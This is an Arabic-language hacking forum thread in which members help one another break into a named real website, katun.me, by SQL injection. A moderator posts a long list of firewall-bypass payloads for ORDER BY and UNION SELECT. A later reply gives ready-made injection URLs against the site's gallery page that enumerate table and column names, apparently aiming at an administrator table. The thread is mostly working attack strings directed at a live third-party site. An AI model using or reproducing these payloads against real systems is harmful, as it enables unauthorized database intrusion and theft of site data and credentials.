تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



.:: قسم مساعدة الاعضاء ::. يهتم بالاسئلة المطروحة واجوبتها , يمنع وضع اسئلتكم في قسم اخر

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية the_injector
the_injector

the_injector غير متواجد حالياً
 
رقم العضوية : 66243
تاريخ التسجيل : Sep 2016
مكان الإقامة :
عدد المشاركات : 18
عدد النقاط : 10
قوة التقييم :
excl تخطي الحماية في ثغرة sql

كُتب : [ 10-03-2016 - 01:00 PM ]


السلام عليكم

واجهت صعوبة في حقن هذا الموقع
http://www.katun.me/news.php?group=2
الأمر ORDER BY لايعمل وعند الإستعمال union select يقوم السيرفر بحظرك
كيف يمكن تخطي هذه الحماية ؟


توقيع : the_injector



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
shell code
مشرف
رقم العضوية : 65945
تاريخ التسجيل : Jul 2016
مكان الإقامة :
عدد المشاركات : 153
عدد النقاط : 10

shell code غير متواجد حالياً

عولقي هاكر

افتراضي

كُتب : [ 10-08-2016 - 12:05 AM ]


الموقع مافتح عندي مش عارف ممكن بسبب ضعف النت حالياا عندي

المهم هذي بعض الطرق جربها قد تنجح معك بعضها


كود PHP:
+Order+By+100 --+-
'+Order+By+100 --+-
+and+0+Order+By+100 --+-
'
+and+0+Order+By+100 --+-

1-Tab (%09); The Tab-key :
%
09group%09by%09100-- -

2-CR (%0D); Carrier Return :
%
0dgroup%0dby%0d100-- -

3-LF (%0A); Line Feed :
%
0Bgroup%0Bby%0A100-- -

4-whitespaces 
%0aOrder%0aBy%0a100 
%0bOrder%0bBy%0b100 
%0cOrder%0cBy%0c100 
%e0%80%a0group%e0%80%a0by%e0%80%a0100 
%c0%a0group%c0%a0by%c0%a0100 
%c0%20group%c0%20by%c0%20100 
＀group＀by＀100 
 
group by 100 

5
With DASH **_**
/**/order/**/by/**_**/100 
/**/order/**/by/**1**/100 

d
[email protected]9 order by 100--+- 
id=9order by 1-- - 
id=9') order by 1-- - 
id=9'
)order by 1%23%23 
id
=9%')order by 1%23%23 
id=Null' 
order by 100--+ 
id=Null' order by 100--+ 
------------
union select 
+union+distinct+select+
+union+distinctROW+select+
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!union*/%0A/*!select*/
/*!union*//*--*//*!all*//*--*//*!select*/
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%'
)and(0)union(select(1),version(),3,4,5,6)%23%23%23
%55nion %53elect 
union
(select(1),2,3)
union (select 1111,2222,3333)
UnIoN/*&a=*/SeLeCT/*&a=*/
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE
(noinu)+REVERSE(tceles)
+
#uNiOn+#sEleCt+
+%0A/**//*!50000%55nIOn*//**/%0A/*!32302%53eLEct*/%0A

توقيع : shell code

فيس بوك
salem al-awlaki

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
BlackRose
المشرف العام
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,241
عدد النقاط : 10

BlackRose غير متواجد حالياً

Injector Boy

افتراضي

كُتب : [ 10-08-2016 - 11:41 PM ]


بعتذر على كثرة مشغلوياتى قريبا ارجع اهتم بالحقن بس اخلص مواضيع التجديدات بالمنتدى وضم المشرفين


توقيع : BlackRose

خبير الأمن والحماية ,قائد فريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI بالـ HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه , مٌحب للأنمي الياباني .
.
facebook.com/Melegy.GHI

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
rawaz karim

رقم العضوية : 41906
تاريخ التسجيل : Apr 2013
مكان الإقامة :
عدد المشاركات : 43
عدد النقاط : 10

rawaz karim غير متواجد حالياً

افتراضي

كُتب : [ 08-23-2017 - 01:28 PM ]


كود PHP:
http://www.katun.me/gallery.php?id=-2 +UNION+/*!50000SELECT*/+1,(/*!50000SELECT*/+GROUP_CONCAT(/*!50000table_name*/+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())-- 


كود PHP:
http://www.katun.me/gallery.php?id=-2 +UNION+/*!50000SELECT*/+1,(/*!50000SELECT*/+GROUP_CONCAT(/*!50000column_name*/+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+/*!50000TABLE_NAME*/=0x61646d696e697374726163696a61)-- 

توقيع : rawaz karim

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
الحماية, تخطي, ثغرة, sql


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مجمع المواقع المصابه - تحديث مستمر TKL .:: SQL-injection , حقن قواعد بيانات ::. 165 07-31-2016 09:55 PM
[ متجدد ] أرشيف مواضيع اعضاء قراصنة غزه الهامه Casper ::. قسم إختراق المواقع والمنتديات .:: 80 07-25-2016 05:36 PM
تخطي الحماية الفور بيدن , تخطي الفور بيدون , تخطي الفوربيدون الحمايه , فوربيدون مشكله zixkhalid ::. قسم إختراق المواقع والمنتديات .:: 0 10-24-2013 10:34 PM
ثغرة في سكربت torrenttrade mekki moh .:: قسم الثغرات ::. 13 04-15-2013 12:50 PM
مجموعة دوراات اختراق مواقع (تجميع) xmayaroos خاص بشروحات الفيديو 34 02-14-2013 02:38 AM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 11:44 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @